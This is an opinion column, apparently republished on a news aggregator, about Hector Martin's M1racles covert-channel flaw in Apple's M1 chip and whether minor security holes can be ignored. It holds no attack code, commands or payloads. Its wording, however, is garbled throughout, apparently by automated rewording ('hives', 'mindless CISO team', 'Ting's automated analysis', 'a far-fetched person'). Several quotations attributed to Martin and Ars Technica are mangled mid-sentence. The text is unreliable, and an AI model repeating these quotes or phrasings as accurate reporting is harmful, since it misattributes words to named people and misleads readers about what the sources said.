Home Uncategorized When is a cyber security hole not a hole? never

When is a cyber security hole not a hole? never

18
0

In cybersecurity, one of the more challenging issues is deciding when a security hole is a big deal, requires immediate improvement or workaround, and when it is small enough to be overlooked or at least deprecated. The tricky part is that much of it involves obscurantly dangerous security, where a vulnerability is left in place and those in the know don’t find it any more. (Classic example: leaving a sensitive web page unprotected, but hoping that its too long and non-intuitive URL isn’t accidentally found.)

And then there’s the real problem: In the hands of a creative and well-resourced bad guy, almost any hole can be taken advantage of in non-traditional ways. but here always a But in cyber security — IT and security professionals cannot practically fix every single hole anywhere in the environment.

Like I said, it’s difficult.

It brings to mind an intriguing M1 CPU hole found by developer Hector Martin, who dubbed the hole M1racles and posted detailed thoughts on this.

Martin described it as “a flaw in the design of the Apple Silicon M1 chip”. [that] Allows any two applications running under an OS to secretly exchange data between them, without using memory, sockets, files, or any other common operating system features. It works between processes running as different users and with different privilege levels, creating a secret channel for secret data exchange. The vulnerability is baked into Apple silicon chips and cannot be fixed without a new silicon revision.”

Martin said: “The only mitigation available to users is to run your entire OS as a VM. Yes, running your entire OS as a VM does have a performance impact” and then suggested that because of the performance hit Users do not do this.

Here things get interesting. Martin argues that, as a practical matter, this is not a problem.

“In fact, nobody’s really going to find a nefarious use for this flaw in practical situations. Plus, there’s already a million side channels you can use for cooperative cross-process communication – like Cache stuff – on every system. Secret channels can’t leak data from uncooperative apps or systems. Actually, it’s worth repeating: Secret channels are completely useless unless your system is already compromised.”

Martin initially said that this flaw could easily be mitigated, but he changed his tune. “Originally I thought the register was per-core. If that was the case, you could erase it on the context switch. But since it’s per-cluster, sadly we’re screwed, because you can’t do that without cross-cluster. Core communication can be going into the kernel. Other than running with TGE=0 in EL1/0 – i.e. inside a VM guest – there is no known way to intercept it.”

Before anyone relaxes, consider Martin’s thoughts about iOS: “iOS is affected, like all other OSes. There are unique privacy implications to this vulnerability on iOS, as it can be used to bypass some of its strict privacy protections.” For example, keyboard apps are not allowed to access the Internet for privacy reasons. A malicious keyboard app could use this vulnerability to send text that the user types to another malicious app. However, since iOS apps are distributed through the App Store it is not allowed to generate code at runtime (JIT), Apple can automatically scan them at submission time and Using static analysis can reliably detect any attempts to exploit this vulnerability, which they already use. We don’t know more about whether Apple plans to deploy these checks for or have they already done so, but they are likely to face are aware of the cause and it is reasonable to expect that they will. Ting’s automated analysis already rejects any attempt to directly use system registers.”

This is where I worry. The security mechanism here is to rely on Apple’s App Store catching apps trying to take advantage of it. Actually? Neither Apple — nor Google’s Android, for that matter — have the resources to properly test each submitted app. If it sounds cool at a glance, an area where the professional bad guys excel, both mobile giants might approve.

In an otherwise excellent piece, Ars Technica said: “The secret channel can circumvent this protection by passing the key press to another malicious app, which in turn will send it over the Internet. Still, there is a possibility that the two apps will pass Apple’s review process and then target.” It will be installed on the device of a far-fetched person.”

far-fetched? Actually? How should IT trust that this hole will do no harm because the odds are against an attacker successfully taking advantage of it, which in turn is based on Apple’s team catching any problematic apps? This is pretty scary logic.

This brings us back to my original point. What’s the best way to deal with hives that require a lot of work and a lot of luck? Given that no enterprise has the resources to properly address every single system hole, what’s an overworked, mindless CISO team to do?

Still, it’s refreshing to find a developer finding a hole and then playing it off as not a big deal. But now that the hole has been effectively made public, my money is on any cyber thief or ransomware extortionist figuring out how to use it. I will give them less than a month to take advantage of it.

The pressure needs to be on Apple to fix this ASAP.

Copyright © 2021 IDG Communications, Inc.

Disclaimer: The opinions expressed within this article are the personal opinions of the author. The facts and opinions appearing in the article do not reflect the views of knews.uk and knews.uk does not assume any responsibility or liability for the same.

For latest entertainment news| health news| political news| sports news| travel news| Covid-19 news| Tech news| Digital Marketing| Lyrics

LEAVE A REPLY

Please enter your comment!
Please enter your name here

This site uses Akismet to reduce spam. Learn how your comment data is processed.